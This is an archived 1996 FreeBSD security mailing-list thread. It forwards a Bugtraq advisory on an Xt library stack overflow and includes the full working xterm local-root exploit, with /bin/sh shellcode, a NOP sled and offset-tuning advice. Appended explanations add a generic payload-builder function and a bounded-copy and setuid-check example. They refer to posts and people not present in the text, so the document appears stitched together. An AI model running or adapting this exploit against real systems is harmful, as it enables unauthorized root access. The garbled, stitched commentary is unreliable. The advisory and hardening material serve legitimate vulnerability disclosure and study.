CC: security@freebsd.org
Subject: Re: [Fwd: mount bug..]
References: <199608241013.MAA04792@gvr.win.tue.nl>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Guido van Rooij wrote:
>
> Julian Elischer wrote:
> > This doesn't work, but I'm wondering why it says it's for freeBSD..
> > did it work on an earlier version? (even with bin replaced by sbin)
> >
> > umount is not suid anyhow, but.....
> > does anyone know about this?
>
> Since they use umount to do the exploit I cannot imagine how they would
> ever get a root shell....umount is not suid.
>
> -Guido

I saw that and agree, I'm just puzzled by it....

From owner-freebsd-security Sat Aug 24 23:05:24 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA10085 for security-outgoing; Sat, 24 Aug 1996 23:05:24 -0700 (PDT)
Received: from gwydion.hns.st-louis.mo.us (kenth@dialup-34.hunter.com [199.217.148.34]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA10079 for ; Sat, 24 Aug 1996 23:05:18 -0700 (PDT)
Received: (from kenth@localhost) by gwydion.hns.st-louis.mo.us (8.7.5/8.7.3) id BAA22181 for freebsd-security@freebsd.org; Sun, 25 Aug 1996 01:05:20 -0500 (CDT)
From: Kent Hamilton
Message-Id: <199608250605.BAA22181@gwydion.hns.st-louis.mo.us>
Subject: Vulnerability in the Xt library (fwd)
To: freebsd-security@freebsd.org
Date: Sun, 25 Aug 1996 01:05:20 -0500 (CDT)
X-Mailer: ELM [version 2.4 PL24 ME8a]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Thought this might be of interest.
----- Forwarded message from Aleph One -----

>From NETSPACE.ORG!owner-bugtraq@scsgate.scscom.com Sat Aug 24 11:50:51 1996
Sender: NETSPACE.ORG!owner-bugtraq@scsgate.scscom.com
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved-By: Aleph One
Message-Id:
Date: Sat, 24 Aug 1996 02:14:24 -0700
Reply-To: Bugtraq List
Sender: Bugtraq List
From: Aleph One
Subject: Vulnerability in the Xt library
X-Cc: xfree86@xfree86.org, jff@x.org, matt@x.org, xbugs@x.org, gildea@x.org
To: Multiple recipients of list BUGTRAQ

There exists at least one vulnerability in the Xt library caused by a
buffer overrun that allows arbitrary code to be executed. This
vulnerability exists in the Xt library itself. As such all programs linked
with it that are suid root or can be coerced into running as root are
vulnerable. The standard example is of course suid xterm.

The vulnerability has been confirmed under FreeBSD, Solaris, and as far as
we can tell every single other OS running all revisions of X11.

There exist a large number of places in the Xt library code where buffers
allocated on the stack are handled insecurely other than the one used in
the following exploit. The Xt library is a can of worms.

The original author of this vulnerability is "b0z0 bra1n".

x86 exploit tested under FreeBSD follows.
For other x86 operating systems play around with the offset:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_OFFSET 0
#define BUFFER_SIZE 1491

/* Return the current stack pointer (i386 only: %eax is the return register). */
long get_esp(void)
{
    __asm__("movl %esp,%eax\n");
}

int main(int argc, char **argv)
{
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    /* i386 FreeBSD shellcode: execve("/bin/sh") via syscall 0x3b (SYS_execve).
       The zero bytes it needs (string terminator, argv terminator and the
       lcall $7,$0 gate at the end) are patched in at run time, so the string
       itself contains none and survives strlen()/strcpy(). */
    char execshell[] =
        "\xeb\x23"
        "\x5e"
        "\x8d\x1e"
        "\x89\x5e\x0b"
        "\x31\xd2"
        "\x89\x56\x07"
        "\x89\x56\x0f"
        "\x89\x56\x14"
        "\x88\x56\x19"
        "\x31\xc0"
        "\xb0\x3b"
        "\x8d\x4e\x0b"
        "\x89\xca"
        "\x52"
        "\x51"
        "\x53"
        "\x50"
        "\xeb\x18"
        "\xe8\xd8\xff\xff\xff"
        "/bin/sh"
        "\x01\x01\x01\x01"
        "\x02\x02\x02\x02"
        "\x03\x03\x03\x03"
        "\x9a\x04\x04\x04\x04\x07\x04";
    int i, ofs = DEFAULT_OFFSET, bs = BUFFER_SIZE;

    /* optional: argv[1] = offset from esp, argv[2] = buffer size */
    if (argc > 1)
        ofs = atoi(argv[1]);
    if (argc > 2)
        bs = atoi(argv[2]);

    printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
           ofs, get_esp() + ofs, bs);

    buff = malloc(4096);
    if (!buff) {
        printf("can't allocate memory\n");
        exit(0);
    }
    ptr = buff;

    /* NOP sled, then the shellcode, filling bs bytes */
    memset(ptr, 0x90, bs - strlen(execshell));
    ptr += bs - strlen(execshell);
    for (i = 0; i < strlen(execshell); i++)
        *(ptr++) = execshell[i];

    /* two copies of the guessed return address, then a terminating NUL */
    addr_ptr = (long *)ptr;
    for (i = 0; i < (8 / 4); i++)
        *(addr_ptr++) = get_esp() + ofs;
    ptr = (char *)addr_ptr;
    *ptr = 0;

    /* the overlong -fg argument is what overruns the stack buffer in Xt */
    execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}

Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

----- End of forwarded message from Aleph One -----

--
Kent Hamilton
Play: KentH@HNS.St-Louis.MO.US   NIC Handle: KH91   URL: http://www.icon-stl.net/~khamilto/
Blessed Be....
Work: KHamilton@Hunter.COM
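Both exploits in this thread (the mount one Adrian forwarded and the Xt one above) build the same argument: a NOP sled, the shellcode, the guessed return address repeated, and a terminating NUL, handed to a program that copies it into a fixed-size stack buffer. What follows is an added example, not code from either post or from Xt: it factors that layout into one function, with a constructed placeholder in place of real shellcode and an arbitrary made-up address, and puts the unbounded copy that makes such a program exploitable next to a bounded version that refuses the oversize argument. The 64-byte buffer, the helper names and the address are assumptions for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Payload layout used by both posted exploits:
 *   [NOP sled][shellcode][return address x n_ret][NUL]
 * buffer_size is the number of bytes before the first return address (the
 * posts use 1024 and 1491, found by trial); the addresses after it are what
 * land on the saved frame pointer and return address.  Returns the strlen()
 * of the payload, or 0 if it does not fit. */
size_t build_payload(unsigned char *out, size_t out_len, size_t buffer_size,
                     const unsigned char *shellcode, size_t sc_len,
                     uint32_t ret_addr, int n_ret)
{
    size_t need = buffer_size + (size_t)n_ret * 4 + 1;
    unsigned char *p = out;
    int i;

    if (n_ret < 0 || sc_len > buffer_size || need > out_len)
        return 0;

    memset(p, 0x90, buffer_size - sc_len);          /* NOP sled */
    p += buffer_size - sc_len;
    memcpy(p, shellcode, sc_len);                   /* shellcode */
    p += sc_len;
    for (i = 0; i < n_ret; i++) {                   /* i386 is little-endian */
        p[0] = (unsigned char)(ret_addr);
        p[1] = (unsigned char)(ret_addr >> 8);
        p[2] = (unsigned char)(ret_addr >> 16);
        p[3] = (unsigned char)(ret_addr >> 24);
        p += 4;
    }
    *p = 0;                                         /* execl() needs a C string */
    return need - 1;
}

/* The pattern Aleph One describes in Xt (and Meltzer in rwhod): a fixed
 * stack buffer filled by an unbounded copy of attacker-controlled data.
 * Only ever called with a short argument here; a long one smashes the stack. */
void vulnerable_copy(const char *arg)
{
    char buf[64];                                   /* assumed size */
    strcpy(buf, arg);                               /* no length check */
    printf("copied %zu bytes\n", strlen(buf));
}

/* Hardened form: refuse input that does not fit rather than truncating it
 * silently.  Returns 0 on success, -1 if src would overflow dst. */
int bounded_copy(char *dst, size_t dst_len, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_len)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

int main(void)
{
    /* Constructed placeholder standing in for real shellcode. */
    const unsigned char fake_shellcode[] = { 0xeb, 0x23, 0x5e, 0xcc };
    unsigned char payload[4096];
    char dst[64];
    size_t n;

    /* Same shape as the Xt exploit: 1491-byte buffer, two return addresses. */
    n = build_payload(payload, sizeof payload, 1491,
                      fake_shellcode, sizeof fake_shellcode, 0xbfbfd0c8u, 2);
    printf("payload is %zu bytes, starts with 0x%02x\n", n, payload[0]);

    vulnerable_copy("xterm");
    printf("bounded_copy(payload) = %d\n",
           bounded_copy(dst, sizeof dst, (const char *)payload));
    printf("bounded_copy(\"xterm\") = %d\n",
           bounded_copy(dst, sizeof dst, "xterm"));
    return 0;
}
```

The "play around with the offset" advice in the post is the ret_addr guess: the sled exists so that any address landing inside the NOPs still slides into the shellcode, which is why the exploits only need esp plus a small constant rather than an exact address.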
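The answer the mount thread above arrives at is that umount and mount are not setuid on FreeBSD, so overflowing them buys only the caller's own shell, while mount_msdos is setuid root to get past the suser() check in mount() and then applies its own policy (real uid 0, or real uid equal to the owner of the mount point). The following is an added example and not FreeBSD's code: a stat()-based check for whether a binary is setuid root, the msdosfs-style policy as Bruce describes it, and a loop over the helpers the thread names. The /sbin paths, the function names and the use of /tmp as a sample mount point are assumptions. One detail worth making explicit: the policy must compare the real uid from getuid(); inside a setuid-root helper geteuid() is 0 for every caller, so testing it would let everyone mount.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 if path is setuid and owned by root, 0 if not, -1 if it cannot be
 * stat()ed.  This is the check Guido and Julian applied to umount by hand. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) && st.st_uid == 0;
}

/* msdosfs-style policy as described in the thread: allow if the real uid
 * is root, or the real uid matches the owner of the proposed mount point.
 * real_uid must come from getuid(), never geteuid() (see lead-in). */
int msdosfs_may_mount(uid_t real_uid, uid_t mountpoint_owner)
{
    return real_uid == 0 || real_uid == mountpoint_owner;
}

/* Same policy applied to a path: stat() the mount point, insist it is a
 * directory, then compare owners.  -1 if the mount point is unusable. */
int msdosfs_may_mount_path(uid_t real_uid, const char *mountpoint)
{
    struct stat st;
    if (stat(mountpoint, &st) != 0 || !S_ISDIR(st.st_mode))
        return -1;
    return msdosfs_may_mount(real_uid, st.st_uid);
}

int main(void)
{
    /* Assumed FreeBSD paths for the helpers the thread mentions. */
    const char *helpers[] = { "/sbin/mount", "/sbin/umount",
                              "/sbin/mount_msdos", "/sbin/mount_union" };
    size_t i;

    for (i = 0; i < sizeof helpers / sizeof helpers[0]; i++) {
        int r = is_setuid_root(helpers[i]);
        printf("%-20s %s\n", helpers[i],
               r < 0 ? "(missing)" : r ? "setuid root" : "not setuid");
    }

    /* Policy decision for this process against /tmp (assumed to exist). */
    printf("uid %u may mount msdosfs on /tmp: %d\n", (unsigned)getuid(),
           msdosfs_may_mount_path(getuid(), "/tmp"));
    return 0;
}
```

Run as an unprivileged user, the loop is the quickest way to tell whether an overflow in a given mount helper is a privilege escalation or merely a crash, which is the distinction the thread turns on.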